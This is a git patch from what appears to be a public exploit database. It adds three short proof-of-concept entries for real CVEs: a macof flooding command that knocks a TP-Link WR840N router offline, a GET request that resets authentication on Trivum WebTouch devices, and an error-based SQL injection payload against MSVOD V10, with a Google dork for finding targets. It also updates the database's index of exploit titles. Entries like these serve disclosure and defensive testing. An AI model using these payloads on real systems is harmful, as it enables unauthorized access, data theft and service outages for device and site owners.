From 350bb348ff5b5827eb7401ee3f835127aa55f2bf Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 21 Jul 2018 05:01:50 +0000 Subject: [PATCH] DB: 2018-07-21 3 changes to exploits/shellcodes TP-Link TL-WR840N - Denial of Service WordPress Plugin All In One Favicon 4.6 - Cross-Site Scripting WordPress Plugin All In One Favicon 4.6 - (Authenticated) Cross-Site Scripting MSVOD 10 - 'cid' SQL Injection Touchpad / Trivum WebTouch Setup 2.53 build 13163 - Authentication Bypass --- exploits/hardware/dos/45064.txt | 20 +++++++++++++++++ exploits/hardware/webapps/45063.txt | 33 +++++++++++++++++++++++++++++ exploits/php/webapps/45062.txt | 11 ++++++++++ files_exploits.csv | 5 ++++- 4 files changed, 68 insertions(+), 1 deletion(-) create mode 100644 exploits/hardware/dos/45064.txt create mode 100644 exploits/hardware/webapps/45063.txt create mode 100644 exploits/php/webapps/45062.txt diff --git a/exploits/hardware/dos/45064.txt b/exploits/hardware/dos/45064.txt new file mode 100644 index 000000000..208951454 --- /dev/null +++ b/exploits/hardware/dos/45064.txt @@ -0,0 +1,20 @@ +# Exploit Title:- TP-Link Wireless N Router WR840N - Buffer Overflow +# Date:- 2018-07-16 +# Vendor Homepage:- https://www.tp-link.com/ +# Hardware Link:- https://www.amazon.in/TP-LINK-TL-WR840N-300Mbps-Wireless-External/dp/B01A0G1J7Q +# Version:- TP-Link Wireless N Router WR840N +# Category:- Hardware +# Exploit Author:- Aniket Dinda +# Tested on:- Linux +# CVE:- CVE-2018-14336 + +********************************************************************************************************** +Proof Of Concept:- + +1- First connect to this network +2- Open terminal => And Type "macof -i eth0 -n 10" +3- Hit Enter +4- You will see that your Net connection will lost. +****************************************************************************************************** +Solutions: +1- You have to Reboot your router . \ No newline at end of file diff --git a/exploits/hardware/webapps/45063.txt b/exploits/hardware/webapps/45063.txt new file mode 100644 index 000000000..ebef2b77b --- /dev/null +++ b/exploits/hardware/webapps/45063.txt @@ -0,0 +1,33 @@ +# Exploit Title: Touchpad / Trivum WebTouch Setup V9 V2.53 build 13163 - Unauthorized Authentication Reset + +# Date: 2018-07-20 + +# Software Link: https://world.trivum-shop.de + +# Version: < 2.56 build 13381 - 12-07-2018 + +# Category: webapps + +# Tested on: + +Touchpad / Trivum WebTouch Setup V9 V2.53 build 13163 of Apr 6 2018 09:10:14 (FW 303) + +# Exploit Author: vulnc0d3 + +# Contact: http://twitter.com/HerwonoWr + +# CVE: CVE-2018-13862 + +1. Description + +Touchpad / Trivum WebTouch Setup V9 V2.53 build 13163 of Apr 6 2018 09:10:14 (FW 303) before 2.56 build 13381 - 12.07.2018, allow unauthorized remote attackers to reset the authentication via "/xml/system/setAttribute.xml" URL, using GET request to the end-point "?id=0&attr=protectAccess&newValue=0" (successful attack will allow attackers to login without authorization). + +2. Proof of Concept + +# GET Request + +http://target/xml/system/setAttribute.xml?id=0&attr=protectAccess&newValue=0 + +3. Vendor Changes Log + +# http://update.trivum.com/update/tp9-changes.html \ No newline at end of file diff --git a/exploits/php/webapps/45062.txt b/exploits/php/webapps/45062.txt new file mode 100644 index 000000000..44dd2452e --- /dev/null +++ b/exploits/php/webapps/45062.txt @@ -0,0 +1,11 @@ +# Exploit Title: MSVOD V10 ¡V SQL Injection +# Google Dork: inurl:"images/lists?cid=13" +# Date: 2018/07/17 +# Exploit Author: Hzllaga +# Vendor Homepage: http://www.msvod.cc/ +# Version: MSVOD V10 +# CVE : CVE-2018-14418 +#Reference : https://www.wtfsec.org/2583/msvod-v10-sql-injection/ + +Payload: +/images/lists?cid=13%20)%20ORDER%20BY%201%20desc,extractvalue(rand(),concat(0x7c,database(),0x7c,user(),0x7c,@@version))%20desc%20--%20 \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 5877ff4e7..67abcdc5d 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6022,6 +6022,7 @@ id,file,description,date,author,type,platform,port 45059,exploits/multiple/dos/45059.txt,"Google Chrome - Swiftshader Texture Allocation Integer Overflow",2018-07-19,"Google Security Research",dos,multiple, 45060,exploits/multiple/dos/45060.html,"Google Chrome - Swiftshader Blitting Floating-Point Precision Errors",2018-07-19,"Google Security Research",dos,multiple, 45061,exploits/multiple/dos/45061.html,"Google Chrome - SwiftShader OpenGL Texture Bindings Reference Count Leak",2018-07-19,"Google Security Research",dos,multiple, +45064,exploits/hardware/dos/45064.txt,"TP-Link TL-WR840N - Denial of Service",2018-07-20,"Aniket Dinda",dos,hardware, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -39686,6 +39687,8 @@ id,file,description,date,author,type,platform,port 45049,exploits/php/webapps/45049.txt,"Smart SMS & Email Manager 3.3 - 'contact_type_id' SQL Injection",2018-07-18,AkkuS,webapps,php,80 45053,exploits/multiple/webapps/45053.txt,"Open-AudIT Community 2.1.1 - Cross-Site Scripting",2018-07-18,"Ranjeet Jaiswal",webapps,multiple, 45054,exploits/php/webapps/45054.txt,"FTP2FTP 1.0 - Arbitrary File Download",2018-07-18,AkkuS,webapps,php, -45056,exploits/php/webapps/45056.txt,"WordPress Plugin All In One Favicon 4.6 - Cross-Site Scripting",2018-07-19,"Javier Olmedo",webapps,php,80 +45056,exploits/php/webapps/45056.txt,"WordPress Plugin All In One Favicon 4.6 - (Authenticated) Cross-Site Scripting",2018-07-19,"Javier Olmedo",webapps,php,80 45055,exploits/php/webapps/45055.py,"Modx Revolution < 2.6.4 - Remote Code Execution",2018-07-18,"Vitalii Rudnykh",webapps,php, 45057,exploits/php/webapps/45057.txt,"MyBB New Threads Plugin 1.1 - Cross-Site Scripting",2018-07-19,0xB9,webapps,php,80 +45062,exploits/php/webapps/45062.txt,"MSVOD 10 - 'cid' SQL Injection",2018-07-20,Hzllaga,webapps,php, +45063,exploits/hardware/webapps/45063.txt,"Touchpad / Trivum WebTouch Setup 2.53 build 13163 - Authentication Bypass",2018-07-20,vulnc0d3,webapps,hardware,